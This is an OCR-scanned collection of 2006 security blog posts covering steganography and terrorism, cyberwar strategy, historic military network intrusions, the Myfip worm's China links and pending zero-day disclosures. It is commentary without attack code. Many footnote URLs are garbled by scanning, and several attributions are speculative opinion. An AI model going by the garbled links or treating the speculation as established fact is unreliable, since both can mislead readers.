. http://tajdeed-list .net/pipermail/pir_tajdeed-list .net/2006-June/000092.htm 


18. http://del.icio.us/DDanchev/Cyberterrorism 
19. http://del.icio.us/DDanchev/Hacktivism 


http://del.icio.us/DDanchev/InformationWarfare 


21. http://ddanchev.blogspot .com/2005/12/cyberterrorism-dont-stereotype-and-its.htm 


22. http://ddanchev. blogspot .com/2006/01/cyberterrorism-recent-developments.htm 


23. http: //ddanchev. blogspot . com/2006/05/current-emerging-and-future-state-of.htm 


24. http://ddanchev.blogspot .com/2006/05/terrorist-social-network-analysis.htm 


. http://ddanchev. blogspot .com/2006/07/hacktivism-tensions-israel-vs.htm 


2.8.22 Face Recognition At Home (2006-08-26 00:48) 


[1] 


In a previous post, [2]Biased Privacy Violation | mentioned two web sites, [3]DontDateHim- 
Girl.com, [4]DontDateHerMan.com and the associated privacy implications out of these. Just 
came across to [5]MyHeritage.com whose [6]face recognition feature works remarkably well - 
for relatives and everyone in between varying on the sample. 


"Recognizing faces is done by algorithms that compare the faces in your photo, with all 
faces previously known to MyHeritage Face Recognition, through photos and meta-data 
contributed by yourself and other users. So the more photos added to the system, the more 
powerful it becomes. If people in your photos are not recognized well, it is likely that MyHer- 
itage.com has never encountered them before. By adding these photos to MyHeritage.com 
and annotating the people in the photo manually, MyHeritage.com will "learn" these faces and 
will be able to recognize them in future photos, even in different ages of the same person’s life. 
Note: the algorithms used by MyHeritage Face Recognition are likely to find relatives of people 
in your photo, due to the genetic-based facial similarities that exist between relatives. You 
can use this to form connections between people whom you never even knew were related." 


Face recognition @home just got a boost and so did the obvious privacy implications 
out of the ever-growing families database, and its natural abuse by interested (third) parties. 
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. http://photos1. blogger .com/blogger/1933/1779/1600/face_recognition. gif 
. http: //ddanchev. blogspot .com/2006/05/biased-privacy-violation_03.htm 


2.8.23 Futuristic Warfare Technologies (2006-08-26 01:27) 


[1] * The future of warfare will definitely have to do with technologies and convergence, at 
least the near one. Some logical developments such as, remote sensing intercontinental UAVs, 
autonomous warfare, remotely controlled forces, network centric warfare, higher reliance 
on Al probability and decision-making scenarios, are just warming up the major innovations 
we’re about to witness - whether defensive or offensive is an entirely different topic. In the 
very long term though, [2]Nano warfare, Robot wars and Cyber wars reaching the levels of 
VR warfare, are among the fully realistic scenarios. Very informative slides on the [3]Future 
Strategic Issues/Future Warfare [Circa 2025], and here are some important key points that 
made me an impression : 


Technological Ages of Humankind 

- Hunter/Killer groups [ Million BC 10K BC] 
- Agriculture [ 10K BC 1800 AD] 

- Industrial [1800-1950] 

- IT [1950-2020] 

- Bio/NANO [2020?] 

- Virtual 


The developments 

- Chem/bio Antifunctionals/Anti fauna 

- Binary agents distributed via imported products (Vitamins, Clothing, Food) 
- Blast Wave Accelerator - global precision strike "On the Cheap" 
- Bio/Chem/Molec./Nano Computing 

- Ubiquitous Optical Comms 

- Micro/Nano/Ubiquitous Sensors 

- BioWeaponry 

- Volumetric weaponry 

- Cyber/Artificial Life (Beyond Al) -? 

- Transoceanic UUV’s, UAV’s - [4]Boing’s X45 series 

- Spherical Submarines to deal with the accoustics issue 


To sum up, the best warriors win their battles without waging war - or at least not against 
themselves. 


1. http: //photos1. blogger. com/blogger/1933/1779/1600/armed_robots. jpg 
2. http: //nanoatlas.ifs.hr/nano-warfare.htm 

3. http: //www.fas.org/man/eprint/FutureWarfare.ppt 
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2.8.24 Microsoft’s OneCare Penetration Pricing Strategy (2006-08-26 14:17) 


[1] * Ina previous post, [2]Microsoft in the Information Security Market, | commented on 
Microsoft’s most recent move into the information security market, and the anti-virus market 
segment. Moreover, several months earlier | pointed out [3]5 things Microsoft can do to secure 
the Internet and why it wouldn’t, namely, 


- Think twice before reinventing the security industry 

- Become accountable, first, in front of itself, than, in front of the its stakeholders 

- Reach the proactive level, and avoid the reactive, in respect to software vulnerabilities 

- Introduce an internal security oriented culture, or better utilize its workforce in respect to 
security 

- Rethink its position in the security vulnerabilities market 


Recently, the much hyped debate on whether Microsoft’s Anti Virus would take a piece 
of the anti virus market seem to have[4] finally materialized with the help of basic pricing 
strategies : 


"Helped by low pricing, Microsoft’s Windows Live OneCare landed the number two spot 
in sales at US stores in its debut month, according to The NPD Group. The antivirus and PC 
care package nabbed 15.4 per cent of security suite sales at retailers such as Best Buy and 
Amazon.com, according to NPD’s data. The average price was $29.67, well below Microsoft’s 
list price of $49.95. Online at Amazon.com, OneCare is available for only $19.99." 


Ya-hoo? Not so fast since stats like these exclude the hundreds of licensing deals, co- 
branding, ISPs affiliation and resellership positions, as well as shipped-ready PCs with software 
from the rest of the vendors : 


"Symantec noted that NPD covers retail sales only, and does not include consumer sales 
through internet service providers and PC makers, for example. "We just had a record June 
quarter in consumer sales, said Mike Plante, a marketing director at the company. You can’t 
really draw market share conclusions from the NPD data alone, particularly with just a month 
of data." 


|! wonder what would Microsoft’s strategy consist of by the time their offering reaches 
the growth stage, and starts maturing, perhaps bargaining by offering software discounts 
and one-stop-shop services. I’ve once pointed out on another [5]anti virus market statistics 
concern, namely Panda Software’s - private company, no SEC or stockholders to bother 
about - stated earnings right next to the rest of publicly traded companies. My point is that, 
if Gartner were to offer a better grasp of this vibrant market segment, they’d better have 
used [6]F-Secure which is a publicly traded anti virus vendor, as it would greatly improve an 
analysts confidence in the provided data, wouldn't it? 


Penetration pricing is all about gaining market share, and Microsoft’s case reminds of 
how [7]RealNetworks were ready to lose cents on each and every song sold through their 
digital music service, but to offer, at least temporary, a competitive alternative to iTunes. 


Security cannot be bought, a false sense of security can though. Whereas risk exposure 
and risk mitigation define a scientific approach going beyond a visionary security manage- 
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ment, it’s arguable which one dominates, as marketing and branding often do the job - if 
(true) advertising does its job, millions of people keep theirs. Case in point, Symantec which 
currently has the largest market share - greatly depends on the geographical area and number 
of anti virus products included - is indeed the market leader, but it doesn’t necessarily mean 
it offers the "leading" product. Exactly the opposite, the most popular, available, one that 
usually comes with Norton’s powerful and well known brand offering. 


Why wouldn’t Microsoft want to [8]license Kaspersky’s, F-Secure’s or Symantec’s tech- 
nology for instance? Because that would have been like a Chinese growth syndrome so 
to speak. The Chinese economy is shifting from a source of raw materials, to an actual 
manufacturer, a little bit of vertical integration given you have something to offer to the 
market at a particular moment in time and start counting the new millionaires. The higher 
proportion of the business machine you own, the greater the profits at the end of quarter, and 
with the key regions across the world still getting online, malware is only going to get more 
attention from both sides of the front. 


From a business point of view, you can twist a user’s actual wants so successfully you 
can make it almost impossible to remember what was needed at the first place - long live the 
sales forces! It is often arguable whether anti virus software has turned into a commodity the 
way media players did, but for the end user - the one with the powerful bandwidth available 
- price and availability speak for themselves. Controversial to some recent comments on 
why [9]the most popular anti virus products don’t work, mostly because malware authors are 
testing their "releases" on these products, they actually do it on [10]all anti virus products 
the way pretty much everyone aware is testing suspicious files, or [11]evaluating vendors’ 
response times. 


Don’t get surprised if next time you buy a cheeseburger, the dude starts explaining the 
basics of zero day protection, and offer you a ZIP-based discount if any on an anti virus solu- 
tion - with up to three licenses for your wired family. Co-branding, licensing and [12]industry 
outsiders are on the look for fresh revenues, and with malware representing the most popular 
threat as well as security "solution" bought, stay tuned a McDonald’s Anti Virus "on-the-go". 
Hopefully one using a licensed technology from a vendor with experience and vision. 


Related posts: 

[13]Look who’s gonna cash for evaluating the maliciousness of the Web 
[14]Spotting valuable investments in the information security market 
[15]Valuing Security and Prioritizing Your Expenditures 

[16]Budget Allocation Myopia and Prioritizing Your Expenditures 


1. http: //photos1.blogger. com/blogger/1933/1779/1600/092503. jpg 


ttp://ddanchev. blogspot .com/2006/05/microsoft-in-information-security.htm 


6. 

7 

8 

9. http://www.zdnet.com.au/blogs/securifythis/soa/Why_popular_antivirus_apps_do_not_work_/0, 39033341, 3926424 
10. 
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12, 
13, 
14. 


15. http://ddanchev. blogspot .com/2006/05/valuing-security-and-prioritizing-your.htm 


16. http://ddanchev. blogspot .com/2006/07/budget-allocation-myopia-and. htm 


2.8.25 Steganography and Cyber Terrorism Communications (2006-08-26 16:13) 


[1] * Following my previous post on [2]Cyber Terrorism Communications and Propaganda, 
I’m continuing to summarize interesting findings on the topic. The use of encryption to ensure 
the confidentiality of a communication, be it criminals or terrorists taking advantage of the 
speed and cheap nature of Internet communications, is often taken as the de-facto type of 
communication. | feel that it’s [3]steganographic communication in all of its variety that’s 
playing a crucial role in terrorist communications. It’s never been about the lack of publicly or 
even commercially obtainable steganographic tools, but the ability to know where and what 
to look for. Here’s a brief [4]comment on a rather hard to intercept communication tool - SSSS 
- Shamir’s Secret Sharing Scheme : 


"No other medium can provide better speed, connectivity, and most importantly anonymity, 
given it’s achieved and understood, and it often is. Plain encryption might seem the obvious 
answer, but to me it’s [5]steganography, having the potential to fully hide within legitimate 
(at least looking) data flow. Another possibility is the use secret sharing schemes. A bit 
of a relevant tool that can be fully utilized by any group of people wanting to ensure their 
authenticity and perhaps everyone’s pulse, is [6]SSSS - Shamir’s Secret Sharing Scheme. 
And no, I’m not giving tips, just shredding light on the potential in here! The way botnets of 
malware can use public forums to get commands, in this very same fashion, terrorists could 
easily hide sensitive communications by mixing it with huge amounts of public data, while still 
keeping it secret." 


Intelligence officials/analysts are often confronted with the difficult task of, should they 
actively work on scanning the entire public Internet, or single partitions of the known chaos, 
namely the majority of [7]lslamic/Jinadi related web sites. Trouble is, it’s heck of a short 
sighted approach, and way too logical one to actually provide results. Moreover, in all the fuss 
of terrorists using steganography, even encryption to communicate, the majority of experts 
- shooting into the dark - have totally neglected the very concept of disinformation. To be 
honest, I’m a little bit surprised on the lack of such, picture the media buzz of a recently 
found map of key region and encoded messages embedded in public image, continue with the 
public institutions raising threat levels, vendors taking advantages of this "marketing window" 
when in between, someone gained access to a third-party’s E-identity and used to creatively 
communicate the real message. 


It’s a public secret that the majority of already obtained [8]Terrorist [9]Training Manuals 
on the Web give instructions on primitive, but IT-centered approaches for anonymity such as 
encryption, use of proxies, and yes, steganography as well. Yet another public secret, these 
very same training manuals are actual copies of unclassified and publicly obtained Intelligence, 
Military and Security research documents. Here’s a chapter on [10]Secret Writing and Cipher 
and Codes. Primitive, but still acting as an indicator of the trend. 
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[11] * The most comprehensive [12]Scan of the USENET for steganography was conducted 
back in 2001, primarily because of the [13]post 9/11 debate on the use of steganography by 
terrorists. Surprisingly, the experiment didn’t find a single hidden image - out of a dictionary 
based attack on the JSteg and JPHide positive images of course : 


"After scanning two million images from eBay without finding any hidden messages, we 
extended the scope of our analysis. A detailed description of the detection framework can be 
found in [14]Detecting Steganographic Content on the Internet. This page provides details 
about the analysis of one million images from the [15]/internet Archive’s USENET archive. 
Processing the one million images with stegdetect results in about 20,000 suspicious images. 
We launched a dictionary attack on the JSteg and JPHide positive images. The dictionary has a 
size of 1,800,000 words and phrases. The disconcert cluster used to distribute the dictionary 
attack has a peak performance of roughly 87 GFLOPS." 


Concerns about the invaluable sample : 

- Used primarily USENET as a possible source for images 

- Excluded music and multimedia files, and the hard to detect while in transmission TCP/IP 
covert communication channels - information can indeed move with the speed of an error 
message 

- Cannot scan the Dark Web, the one closed behind common crawlers blocking techniques or 
simple authentication 

- Cannot scan what’s not public, namely malware-infected hosts, or entire communication 
platforms hosted on a defaced web server somewhere, temporary communication dead 
boxes - and while taking about such, [16]free web space providers can provide interesting 
information given you know where and what to look for as always 


The bottom line is that if someone really wants to embed something into a commodity 
data such as video, picture or an MP3 file, they would. Generating more noise when there’s 
enough of it is on the other hand a smart approach | feel is getting abused all the time. How 
to deal with the problem? Ensure your [17]ECHELON approaches are capable of detecting 
the patterns of the majority of public/commercial steganography tools. And according to 
[18]public sources, that seems to be the case already : 


"R2051 Steganography Decryption by Distributive Network Attack Develop a dis- 
tributive network analysis application that can detect, identify, and decrypt steganography 
in multiple types of files, including commonly used audio, video and graphic file formats.The 
application must quickly and accurately detect and identify files containing steganography 
and extract the hidden messages and data from the file. Decryption of any messages or data 
encoded before the use of a steganography program is not required. The system must allow 
for easy, low-cost, frequent updating to counter new emerging programs. It must detect, 
extract, and decrypt messages in any file that has used any currently commercially available 
steganography programs as well as commonly encountered non-commercial programs. These 
would include, but are not limited to, the following: Covert.tcp; dc-Steganograph; EzStego; 
FFEncode; Gzsteg; Hide 4 PGP; Hide and Seek 4.1; Hide and Seek 5.0; Hide and 
Seek for Windows 95; jpeg-jsteg; Paranoid, Paranoid1.1.hqx.gz; PGE - Pretty Good 
Envelope; PGPn123; S-Tools : S-Tools 1.0 (Italy, Finland); S-Tools 2.0 (Italy, Finland); 
S-Tools 3.0 (Italy), Finland); S-Tools 4.0 (Italy, Finland); Scytale; Snow; Stealth, 
Stealth 2.01 ; Steganos 1.4; Steganos for Windows 95 and upgrade 1.0a; Stego by 
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John Walker; Stego by Romana Machado; Stegodos; Texto; wbStego; WitnesSoft; and 
WINSTORM" 


The rest is making sense out of the noise and OSINT approaches for locating the "bad 
neighborhoods". 


Figure courtesy of Bauer 2002 at the FBI’s [19]Overview of Steganography for the Com- 
puter Forensics Examiner. 
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18. ttps://bids.tswg.gov/TSWG/bids.nsf/0/72E38BD12096D4B785257 1220065F251//%24FILE/W91CRB-06-T-0032_BAA_Pkg. 


19. http://www.fbi.gov/hq/lab/fsc/backissu/ july2004/research/2004_03_research01.ht 


2.8.26 Bed Time Reading - Spying on the Bomb (2006-08-27 23:45) 


[1] * Continuing the [2]Bed Time Reading series, and a previous post related to [3]India’s 
Espionage Leaks, this book is a great retrospective on the [4]U.S Nuclear Intelligence from 
Nazi Germany to Iran and North Korea. 


In-depth review with an emphasis on India’s counterintelligence tactics: 


"India’s success in preventing U.S. spy satellites from seeing signs of the planned 
tests days to weeks in advance was matched by its success in preventing acquisition 
of other types of intelligence. India’s Intelligence Bureau ran an aggressive counterintel- 
ligence program, and the CIA, despite a large station in New Delhi, was unable to recruit a 
single Indian with information about the Vajpayee government’s nuclear plans. Instead, the 
deputy chief of the CIA station in New Delhi was expelled after a botched try at recruiting 
the chief of Indian counterintelligence operations. Former ambassador Frank Wisner recalled 


that ‘we didn’t have... the humans who would have given us an insight into their intentions’. 
Ambassadors do not keep aloof from the CIA’s work, evidently. Their denials are false. 


NSA’s eavesdropping activities did not detect test preparations. "It’s a tough problem," 
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one nuclear intelligence expert told investigative journalist Seymour Hersh. India’s nuclear 
weapons establishment would communicate via encrypted digital messages relayed 
via small dishes through satellites, using a system known as VSAT (very small 
aperture terminal), "a two-way version of the system used by satellite television 
companies". Good show. At the end of the day, Americans admitted that even if they had 
been better informed, they could not have prevented Pokhran II just as they could not deter 
Pakistan from staging its tests at Chagai." 


Was the [5]USSR’s tactic of helping the enemies of their enemies, thus ruining the Nuclear-club 
monopoly by making the A-bomb a public secret, the smartest or dumbest thing they ever did? 
Monopolies are bad by default, but balance is precious as the "rush must always be tempered 
with wisdom". [6]How about a nice game of chess instead? 


Related resources and posts: 

[7]Nuclear 

[8]Who needs nuclear weapons anymore? 

[9]North Korea’s Strategic Developments and Financial Operations 
[10]Japan’s Reliance on U.S Spy Satellites and Early Warning Missile Systems 


1. http: //photos1.. blogger. com/blogger/1933/1779/1600/20060825001007501 . jpg 

2. http: //ddanchev. blogspot .com/2006/08/bed-time-reading-symbian-os-platform_12.html 
3. http: //ddanchev. blogspot. com/2006/07/indias- espionage-leaks. html 

4. hstp://w hinduonnet con/fne/stories/20060626001007500.nt 

beg /aucioac apenas ive. og manosa oorermszen al 

6, psp: //adanchov.bogspr con/2006/08/avarofweokend- wa gamae a 

7. 

8. 

9. 


http://del.icio.us/DDanchev/Nuclea 
ttp://ddanchev. blogspot .com/2006/02/who-needs-nuclear-weapons- anymore. htm 
ttp://ddanchev. blogspot .com/2006/08/north-koreas-strategic-developments.htm 


10. http: //ddanchev.blogspot .com/2006/07/japans-reliance-on-us-spy-satellites htm 


2.8.27 Cyber War Strategies and Tactics (2006-08-28 00:39) 


[1] = Starting from the basic premise that "[2]AIl warfare is 
based on deception", the Cyberspace offers an unprecedented amount of asymmetric power 
to those capable of using it. Cyber wars are often perceived as innocent exchange of "virtual 
shots" between teenage [3]defacement groups, whereas if one’s willing the embrace the 
rough reality, Hacktivism remains a sub-activity of [4]Cyberterrorism, where [5]Information 
Warfare unites all these tactics. 


Quality techno-thrillers often imply the notion of [6]future warfare battles done in the 
[7]virtual realm compared to actual spill of blood and body parts - [8]death is just an upgrade. 
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Coming back to today’s Hacktivism dominated mainstream news space, you may find this 
paper on [9]Cyberwar Strategy and Tactics - An Analysis of Cyber Goals, Strategies, Tactics, 
and Techniques, and the development of a Cyber war Playbook, informative reading : 


"To create a cyberwar playbook, we must first understand the stratagem building blocks 
or possible moves that are available. It is important to note however that these stratagem 
building blocks in and of themselves are not strategic. Instead, it is the reasoned application 
of one or more stratagems in accomplishing higher-level goals that is strategic in nature. We 
thus need to understand the situations in which the stratagems should be applied and how. 
We can begin to predict and choose the most effective stratagem for a given situation as we 
become more experienced. Example stratagems include: 


Fortify Dodge 
Deceive Block 
Stimulate Skirt 
Condition Monitor 


Stratagems may also have sub-stratagems. Examples are: 


Deceive. Chaff — Block.Barricade 
Deceive.Fakeout — Block.Cutoff 
Deceive.Conceal — Monitor.Eavesdrop 
Deceive.Feint — Monitor.Watch 
Deceive.Misinform — Monitor.Follow 


These stratagems are very high level and can be supported through many tactical means. 
Each building block defines a stratagem and contains one or more possible tactical imple- 
mentations for that stratagem, including requirements, goals that may be satisfied using the 
stratagem, caveats, example uses, and possible countermeasures." 


No matter the NCW doctrine, UAVs intercepting or hijacking signals, "[10]shock and awe" still 
dazzles the majority of prone to be abused by cheap [11]PSYOPS masses of "individuals". 


Related resources and posts: 

[12]Network Centric Warfare basics back in 1995 
[13]Information Warfare 

[14]Cyber Warfare 

[15]Who’s Who in Cyber Warfare? 

[16]North Korea’s Cyber Warfare Unit 121 

[17]Hacktivism Tensions - Israel vs Palestine Cyberwars 
[18]Achieving Information Warfare Dominance Back in 1962 


1 
2. 

3. 

4 

5. 

7. 

8. 


ttp://www.findarticles.com/p/articles/mi_mOEPF/is_n8_v95/ai_17459300 


ttp://www.cyberpunkreview. com/cyberpunked-living/dose-interview-with-gene-generations-pearry-reginald-te 


© [8] 


- and_Tactics.pdf 


10. 

11. 

12. 

13 

14, 

15. 

16. http: //ddanchev.blogspot .com/2006/07/north-koreas-cyber-warfare-unit-121.htm 
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2.9 September 
2.9.1 The Walls and Lamps are Listening (2006-09-02 00:13) 


[1] * And so are the hardware implanted "covert operatives". 


1. 
2.9.2 The Biggest Military Hacks of All Time (2006-09-02 00:21) 


[1] * The [2]biggest military hack of all time, the [3]Pentagon hacker, the [4]NASA hacker 
- hold your breath, it’s another media hype or traffic acquisition headline strategy by the 
majority of online media sites. Who else are we missing? The NASA port scanner, the true 
walking case study on tweaking NMAP for subconscious espionage purposes, the [5]CIA IRC 
junkies that managed to talk them into talking with "them", and Bozo the clown chased by the 
[6]Thought Police for his [7]Jintentions. 


Great examples of buzz generating, deadline-centered news articles you can always amuse 
yourself with, and feel sorry for the lack of insightful perspectives nowadays - I’m slowly 
compiling a list of best of the best news items ever, so let there be less [8]intergalactic 
security statements, and less [9]flooding web sites with Hezbollah data stories. 


In case you’ve somehow missed [10]Gary McKinnon’s story, don’t you worry as you haven’t 
missed anything spectacular, besides today’s flood of reporters with claimed prehistoric IT 
security experience - you must make the different between a reporter, a journalist, and a 
barking dog thought. Perhaps the only objective action done by an industry representative 
was the [11]Sophos survey on Gary McKinnon. It would be much more credible to differentiate 
the severity of the hack, depending on which military or government network was actually 
breached, don’t just go where the wind blows, barely reporting, where’s YOUR opinion if ANY? 


Was it the NSANet, the [12]Joint Worldwide Intelligence Communications System [JWICS], 
the [13]Secret Internet Protocol Router Network (SIPRNET), or the [14]Unclassified but Sensi- 
tive Internet Protocol Router Network (NIPRNet) actually breached? 


Moreover, were the following real-life examples a paintball game or something : 
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- [15]Solar SunRise 

"SOLAR SUNRISE was a series of DoD computer network attacks which occurred from 1-26 
February 1998. The attack pattern was indicative of a preparation for a follow-on attack on 
the DII. DoD unclassified networked computers were attacked using a well-known operating 
system vulnerability. The attackers followed the same attack profile: (a) probing to determine 
if the vulnerability exists, (b) exploiting the vulnerability, (c) implanting a program (sniffer) to 
gather data, and (d) returning later to retrieve the collected data." 


- [16]Dutch hackers during the Gulf War 

"At least one penetrated system directly supported U.S. military operations in Operation 
Desert Storm prior to the Gulf War. They copied or altered unclassified data and changed 
software to permit future access. The hackers were also looking for information about nuclear 
weapons. Their activities were first disclosed by Dutch television when camera crews filmed 
a hacker tapping into what was said to be U.S. military test information." 


- [17]The Case Study: Rome Laboratory, Griffiss Air Force Base 

"However, events really began in 1994, when the two young men broke into an Air Force 
installation known as Rome Labs, a facility at the now closed Griffiss Air Force Base, in New 
York. This break-in became the centerpiece of a Government Accounting Office report on 
network intrusions at the Department of Defense in 1996 and also constituted the meat of a 
report entitled "Security and Cyberspace" by Dan Gelber and Jim Christy, presented to the 
Senate Permanent Subcommittee on Investigations during hearings on hacker break-ins the 
same year. It is interesting to note that Christy, the Air Force Office of Special Investigations 
staffer/author of this report, was never at Rome while the break-ins were being monitored." 


- [18]Moonlight Maze 

"It was claimed that these hackers had obtained large stores of data that might include 
classified naval codes and information on missile guidance systems, though it was not certain 
that any such information had in fact been compromised." 


- [19]Titan Rain 
"Titan Rain hackers have gained access to many U.S. computer networks, including those at 
Lockheed Martin, Sandia National Laboratories, Redstone Arsenal, and NASA." 


- [20]Chinese hackers who supposedly downloaded 10 to 20 terabytes from the NIPR- 
Net - it’s like | love you from 1 to 50, and you? 


From another perspective, the biggest military hack doesn’t have to come from the out- 
side, but from the inside, as [21]soldiers are easily losing their USB sticks on the field. 
Breaching the SIPRnet from the ouside would be a good example of a big military hack, but 
then again, [22]insiders are [23]always there to "take care". 


If [24]Gary McKinnon did the biggest military hack of all time, why do | still hear Bozo 
singing - ta ta tararata ta ta rara tata. 


UPDATE: 

Related posts you might also find informative - [25]North Korea’s Cyber Warfare Unit 121, 
[26]Techno imperialism and the effect of Cyber terrorism, [27]Cyber War Strategies and 
Tactics, the rest you can [28]Google. Surprised to come across the post at [29]Meneame.net 
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too. 


26. http://ddanchev. blogspot .com/2006/05/techno-imperialism-and-effect-of.htm 
27. http://ddanchev. blogspot .com/2006/08/cyber-war-strategies-and-tactics.htm 


. http://www. google. com/search?hl=enkgq=site/3Addanchev.blogspot.com+cyber+warfare 


. http: //meneame.net/story/the-biggest-military-hacks-of-all-time 


2.9.3 Chinese Hackers Attacking U.S Department of Defense Networks 
(2006-09-03 20:58) 


[1] * This may prove to be an [2]informative forum, and | feel that the quality of the questions 
and the discussion faciliator’s insights in the topic - as a matter of fact GCN has proven a 
reliable source on the topic - will be my benchmark for a provocative many-to-many discussion. 


Here are my questions : 


- Despite PRC’s growing Internet population and military thinking greatly emphasizing on 
pros of information/cyber warfare - the concepts copied from the U.S in between Sun Tzu’s 
mode of thinking and attitude may indeed prove a dangerous combination - | find it a bit more 
[3]complex issue as: "Let’s don’t forget the use and abuse of island hopping points fueling 
further tensions in key regions and abusing the momentum itself, [4]physically locating a 
network devicein the future IPv6 network space is of key interest to all parties." China’s 
growing Internet population results in lots of already infected malware hosts that could easily 
act as stepping stones by third-parties. 
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My point : Is it a geopolitical tension engineering, or an active doctrine already in im- 
plementation? 


- If it’s indeed a Red Storm Rising, what’s North Korea’s place in the situation, could it 
be North Korea engineering and impersonating China’s cyber forces thus helping the enemies 
of its enemies? 


- What significant is the threat from actual PRC’s cyber warfare devisions, compared to 
utilizing the massess of script kiddies and promoting - and not prosecuting attacks on foreign 
adversaries - hacking activities? Script kiddies pretending to be 133t, or cyber warfare divisions 
using retro techniques to disinform on the actual state of military preparedness? The rise of 
intellectual property theft worms that | [5]discussed, especially [6]Myfip has been connected 
with the Titan Rain attacks on military networks, but this can be so easily engineered to point 
out wherever you want it to : 


"Myfip doesn’t spread back out via the Simple Mail Transfer Protocol (SMTP). "There is 
no code in the worm to do this," the report said. "From certain key headers in the message, 
we can tell that the attachment was sent directly to [users]." One element that stands out 
is that Myfip e-mails always have one of two X-Mailer headers: X-Mailer: FoxMail 4.0 beta 2 
[cn] and X-Mailer: FoxMail 3.11 Release [cn]. Also, it always uses the same MIME boundary 
tag: _NextPart _2rfkindysadvnqw3nerasdf. "These are signs of a frequently-seen Chinese 
spamtool...," the report said. Stewart said his team was easily able to trace the source of 
Myfip and its variants. "They barely make any effort to cover their tracks," he said. And in 
each case, the road leads back to China. Every IP address involved in the scheme, 
from the originating SMTP hosts to the "document collector" hosts, are all based 
there, mostly in the Tianjin province." 


- Where does the real threat come from exactly? Hackers reading unclassified but sensi- 
tive clerk’s emails thus exposing the network’s design and gathering intelligence for the 
future "momentum", or the use of [7]PSYOPS online? How is the second measured as a key 
foundation for successful information warfare battle? 


- Is it a state sponsored espionage and cyber warfare practices, or mainland [8]hacktivists, 
perhaps even hired third party guns? 


Image courtesy of Chinese hacktivists diversifying their attacks and causing more noise 
during the [9]U.S/China cyber skirmish. 


Related resources and posts: 

[10]Cyber Warfare 

[11]Information Warfare 

[12]Hacktivism Tensions - Israel vs Palestine Cyberwars 
[13]Cyber War Strategies and Tactics 

[14]Who’s who in Cyber Warfare? 


1. http://photos1. blogger .com/blogger/1933/1779/1600/QFZ_email_flooder_hacktivism.2. jpg 
2 

3. 

a 


581 


5 
6 
7 

8. : 

9. . 


10. 
12. 
13, 


14. http: //ddanchev. blogspot .com/2006/05/whos-who-in-cyber-warfare.htm 


2.9.4 Zero Day Initiative Upcoming Zero Day Vulnerabilities (2006-09-04 21:03) 


[1] * Details on a dozen of "[2]upcoming zero day vulnerabilities" are emerging from [3]Tip- 
pingPoint’s Zero Day Initiative : 


"Over the past year, the most resounding suggestion from our Zero Day Initiative researchers 
was to add more transparency to our program by publishing the pipeline of vendors with pend- 
ing zero day vulnerabilities. The following is a list of vulnerabilities discovered by researchers 
enrolled in the Zero Day Initiative that have yet to be publicly disclosed. The affected vendor 
has been contacted on the specified date and while they work on a patch for these vulnerabil- 
ities, TippingPoint customers are protected from exploitation by IPS filters delivered ahead of 
public disclosure. A list of [4]published advisoriesis also available." 


Note the time from vulnerability reporting to patch on some vendors: 


ZDI-CAN-041 - Computer Associates - High - 2006.04.07, 144 days ago 
ZDI-CAN-042 - Adobe - High - 2006.04.07, 144 days ago 

ZDI-CAN-046 - Computer Associates - High - 2006.04.07, 144 days ago 
ZDI-CAN-061 - Microsoft - High - 2006.06.14, 76 days ago 


Don’t be in a hurry to blame the vendors, as in between having to deal with these zero day 
vulnerabilities, they’re all providing patches to fix the emerging ones, that is those who get the 
highest publicty and make the headlines so actively that there’s no other way but dedicating 
product development time to quality assurance. Keep in mind that, even though vendors are 
still working on fixing these, apparently TippingPoint’s IPS customers are protected - they’re 
aware of these exploits. Excluding the vendor dependability issue, and the fact that ZDI is 
indisputably turning into a HR-on-demand think-tank for vulnerability research, | discussed 
some of the issues regarding the possible motivation of the vulnerability informediaries and 
what to keep in mind in a previous [5]post : 


- trying to attract the most talented researchers, instead of having them turn to the dark side? 
| doubt they are that much socially oriented, but still it’s an option? 


- ensuring the proactive security of its customers through first notifying them, and them and 
then the general public? That doesn’t necessarily secures the Internet, and sort of provides the 
clientele with a false feeling of security, "what if' a (malicious) vulnerability researcher doesn’t 
cooperate with iDefense, and instead sells an Oday to a competitor? Would the vendor's IPS 
protect against a threat like that too? 


- fighting against the permanent opportunity of another Oday, gaining only a temporary mo- 
mentum advantage? 
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- improving the company’s clients list through constant collaboration with leading vendors while 
communication a vulnerability in their software products? 


Diversify your infrastructure to minimize the damages due to zero day outbreaks, ensure end 
users are privileged as much as they need, do your homework, camouflage and implement 
early warning systems/decoys, and yes, keep track of your assets and ensure they’re already 
protected from what’s known to be their vulnerability. Responsible disclosure is the socially 
oriented approach, trouble is the Internet itself is a capitalistic society with basic market forces. 


Related posts: 


[6]Was the WMF vulnerability purchased for $4000?! 
[7]Obay - how realistic is the market for security vulnerabilities? 
[8]Scientifically Predicting Software Vulnerabilities 


1 fieepi7 photos ogger. con/togger/1998/1779/1600/2ai.1 Jpd 
2, http://adanchev. blogspot. con/2006/05 delaying yesterdays~Odaj~security hal 
3. http://www.zerodayinitiative.com/upcoming advisories.htm 

4. hetp:/ wv. zerodayinitiative.con/advisories. tn 

5 eg //aencast  opsne coal 2006/00 /ausres my Goa iaas aad 

6. 

7. 

8. 


ttp://ddanchev.blogspot.com/2006/01/was-wmf-vulnerability-purchased-for.htm 


ttp://ddanchev. blogspot .com/2005/12/0bay-how-realistic-is-market-for.html 


ttp://ddanchev.blogspot.com/2006/07/scientifically-predicting-software.htm 


2.9.5 Stealth Satellites Developments Source Book (2006-09-04 23:40) 


[1] ™® You can’t [2]hijack, intercept or hide from what you don’t see or don’t know it’s there, 
and stealthy satellites are going to get even more attention in the ongoing [3]weaponization of 
space and the emerging [4]space warfare arms race. Here’s a [5]huge compilation of articles 
and news items related to the development of stealthy satellites. An excerpt from an article 
within : 


"The United States is building a new generation of spy satellites designed to orbit unde- 
tected, in a highly classified program that has provoked opposition in closed congressional 
sessions where lawmakers have questioned its necessity and rapidly escalating price, ac- 
cording to U.S. officials. The previously undisclosed effort has almost doubled in projected 
cost - from $5 billion to nearly $9.5 billion, officials said. The National Reconnaissance Office, 
which manages spy satellite programs, has already spent hundreds of millions of dollars on 
the program, officials said. The stealth satellite, which would probably become the largest 
single-item expenditure in the $40 billion intelligence budget, is to be launched in the next five 
years and is meant to replace an existing stealth satellite, according to officials. Non-stealth 
satellites can be tracked and their orbits can be predicted, allowing countries 
to attempt to hide weapons or troop movements on the ground when they are 
overhead. Opponents of the new program, however, argue that the satellite is no longer a 
good match against today’s adversaries: terrorists seeking small quantities of illicit weapons, 
or countries such as North Korea and Iran, which are believed to have placed their nuclear 
weapons programs underground and inside buildings specifically to avoid detection from spy 
